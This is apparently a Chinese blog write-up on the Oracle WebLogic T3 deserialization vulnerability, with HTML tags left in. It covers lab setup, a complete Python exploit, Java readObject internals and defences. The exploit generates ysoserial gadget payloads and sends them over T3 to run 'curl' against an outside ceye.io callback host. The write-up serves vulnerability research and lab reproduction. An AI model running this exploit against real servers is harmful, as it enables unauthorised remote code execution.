WebLogic T3协议漏洞分析与复现<\/h1>

0x01 WebLogic简介<\/h2>
WebLogic是美国Oracle公司出品的一个application server，确切地说是一个基于JAVAEE架构的中间件。它用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器，将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。<\/p>

0x02 T3协议基础<\/h2>

T3协议是WebLogic用于通信的协议，类似于RMI的JRMP，都是一对一的模式。T3协议在传输序列化数据时分为几个部分：<\/p>

协议头<\/strong>：格式为t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n<\/code>，发送后会获得一个包含WebLogic版本号的response<\/li> <\/ol> 攻击手段主要分为两种：<\/p> 将WebLogic发送的Java序列化数据的第二到九部分的任意一个替换为恶意的序列化数据<\/li> 将WebLogic发送的Java序列化数据的第一部分与恶意的序列化数据进行拼接<\/li> <\/ol> 0x03 环境搭建<\/h2> 使用Docker搭建环境<\/h3> docker build --build-arg JDK_PKG=<\/span>jdk-7u21-linux-x64.tar.gz \ <\/span><\/span><\/span><\/span> --build-arg WEBLOGIC_JAR=<\/span>wls1036_generic.jar \ <\/span><\/span><\/span><\/span> -t weblogic1036jdk7u21 . <\/span><\/span> <\/span><\/span>docker run -d -p 7001:7001 -p 8453:8453 -p 5556:5556 \ <\/span><\/span><\/span><\/span> --name weblogic1036jdk7u21 weblogic1036jdk7u21 <\/span><\/span><\/code><\/pre>访问地址：http:\/\/localhost:7001\/console\/login\/LoginForm.jsp<\/code><\/p> 默认用户名：weblogic<\/code><\/li> 默认密码：qaxateam01<\/code><\/li> <\/ul> 远程调试配置<\/h3> 导出WebLogic的依赖jar包<\/li> 运行脚本开启debug模式（端口8453）<\/li> 在IDEA中配置远程调试<\/li> <\/ol> 0x04 漏洞复现<\/h2> 使用Python EXP<\/h3> import<\/span> socket <\/span><\/span>import<\/span> sys <\/span><\/span>import<\/span> struct <\/span><\/span>import<\/span> re <\/span><\/span>import<\/span> subprocess <\/span><\/span>import<\/span> binascii <\/span><\/span> <\/span><\/span>def<\/span> get_payload1<\/span>(gadget, command): <\/span><\/span> JAR_FILE =<\/span> 'ysoserial.jar'<\/span> <\/span><\/span> popen =<\/span> subprocess.<\/span>Popen(['java'<\/span>, '-jar'<\/span>, JAR_FILE, gadget, command], stdout=<\/span>subprocess.<\/span>PIPE) <\/span><\/span> return<\/span> popen.<\/span>stdout.<\/span>read() <\/span><\/span> <\/span><\/span>def<\/span> get_payload2<\/span>(path): <\/span><\/span> with<\/span> open(path, "rb"<\/span>) as<\/span> f: <\/span><\/span> return<\/span> f.<\/span>read() <\/span><\/span> <\/span><\/span>def<\/span> exp<\/span>(host, port, payload): <\/span><\/span> sock =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM) <\/span><\/span> sock.<\/span>connect((host, port)) <\/span><\/span> <\/span><\/span> handshake =<\/span> "t3 12.2.3<\/span>\n<\/span>AS:255<\/span>\n<\/span>HL:19<\/span>\n<\/span>MS:10000000<\/span>\n\n<\/span>"<\/span>.<\/span>encode() <\/span><\/span> sock.<\/span>sendall(handshake) <\/span><\/span> data =<\/span> sock.<\/span>recv(1024<\/span>) <\/span><\/span> <\/span><\/span> pattern =<\/span> re.<\/span>compile(r<\/span>"HELO:(.*).false"<\/span>) <\/span><\/span> version =<\/span> re.<\/span>findall(pattern, data.<\/span>decode()) <\/span><\/span> if<\/span> len(version) ==<\/span> 0<\/span>: <\/span><\/span> print("Not Weblogic"<\/span>) <\/span><\/span> return<\/span> <\/span><\/span> print("Weblogic <\/span>{}<\/span>"<\/span>.<\/span>format(version[0<\/span>])) <\/span><\/span> <\/span><\/span> data_len =<\/span> binascii.<\/span>a2b_hex(b<\/span>"00000000"<\/span>) # 数据包长度占位<\/span> <\/span><\/span> t3header =<\/span> binascii.<\/span>a2b_hex(b<\/span>"016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006"<\/span>) <\/span><\/span> flag =<\/span> binascii.<\/span>a2b_hex(b<\/span>"fe010000"<\/span>) # 反序列化数据标志<\/span> <\/span><\/span> <\/span><\/span> payload =<\/span> data_len +<\/span> t3header +<\/span> flag +<\/span> payload <\/span><\/span> payload =<\/span> struct.<\/span>pack('>I'<\/span>, len(payload)) +<\/span> payload[4<\/span>:] # 重新计算数据包长度<\/span> <\/span><\/span> sock.<\/span>send(payload) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> host =<\/span> "192.168.24.129"<\/span> <\/span><\/span> port =<\/span> 7001<\/span> <\/span><\/span> gadget =<\/span> "Jdk7u21"<\/span> # 或 CommonsCollections1<\/span> <\/span><\/span> command =<\/span> "curl http:\/\/4z65as.ceye.io\/"<\/span> <\/span><\/span> payload =<\/span> get_payload1(gadget, command) <\/span><\/span> exp(host, port, payload) <\/span><\/span><\/code><\/pre>验证漏洞<\/h3> 执行EXP后会显示WebLogic版本号<\/li> 在ceye网站上可以看到命令执行成功<\/li> <\/ol> 0x05 漏洞分析<\/h2> 反序列化入口点<\/h3> 反序列化发生在InboundMsgAbbrev<\/code>类的readObject<\/code>方法中，该方法调用了ServerChannelInputStream<\/code>的readObject<\/code>方法。<\/p> ServerChannelInputStream<\/code>继承了ObjectInputStream<\/code>，但没有重写readObject<\/code>方法，resolveClass<\/code>方法也是调用的父类方法。<\/p> 原生readObject分析<\/h3> import<\/span> java.io.*;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> originReadObject<\/span> implements<\/span> Serializable {<\/span> <\/span><\/span> public<\/span> int<\/span> age;<\/span> <\/span><\/span> public<\/span> String name;<\/span> <\/span><\/span> <\/span><\/span> originReadObject(<\/span>int<\/span> age,<\/span> String name)<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>age<\/span> =<\/span> age;<\/span> <\/span><\/span> this<\/span>.<\/span>name<\/span> =<\/span> name;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ ... getter和setter方法省略 <\/span><\/span><\/span><\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> originReadObject oro =<\/span> new<\/span> originReadObject(<\/span>19<\/span>,<\/span> "crilwa"<\/span>);<\/span> <\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"1.ser"<\/span>));<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>oro);<\/span> <\/span><\/span> <\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream((<\/span>new<\/span> FileInputStream(<\/span>"1.ser"<\/span>)));<\/span> <\/span><\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>反序列化流程<\/h4> 进入readObject0<\/code>方法，读取数据流的第一个字节<\/li> 根据字节值进入不同的case分支（TC_OBJECT对应115）<\/li> 调用readOrdinaryObject<\/code>方法<\/li> 调用readClassDesc<\/code>方法读取类描述符<\/li> 进入readNonProxyDesc<\/code>方法<\/li> 调用resolveClass<\/code>方法将类的序列化描述符加工成该类的Class对象使用sun.misc.VM.latestUserDefinedLoader()<\/code>作为类加载器<\/li> <\/ul> <\/li> 判断是否重写了readObject<\/code>方法如果重写，调用invokeReadObject<\/code><\/li> 否则调用defaultReadFields<\/code><\/li> <\/ul> <\/li> <\/ol> WebLogic修复方式<\/h3> WebLogic后续通过重写resolveClass<\/code>方法来实现反序列化攻击的防御，在resolveClass方法中添加了类名白名单校验等安全措施。<\/p> 总结<\/h2> WebLogic T3协议漏洞的核心在于：<\/p> T3协议传输过程中对序列化数据缺乏有效验证<\/li> WebLogic默认配置中存在危险的反序列化点<\/li> 攻击者可以通过构造恶意序列化数据实现远程代码执行<\/li> <\/ol> 防御措施包括：<\/p> 升级到最新版本<\/li> 关闭不必要的T3协议服务<\/li> 配置反序列化过滤器<\/li> 限制网络访问权限<\/li> <\/ol>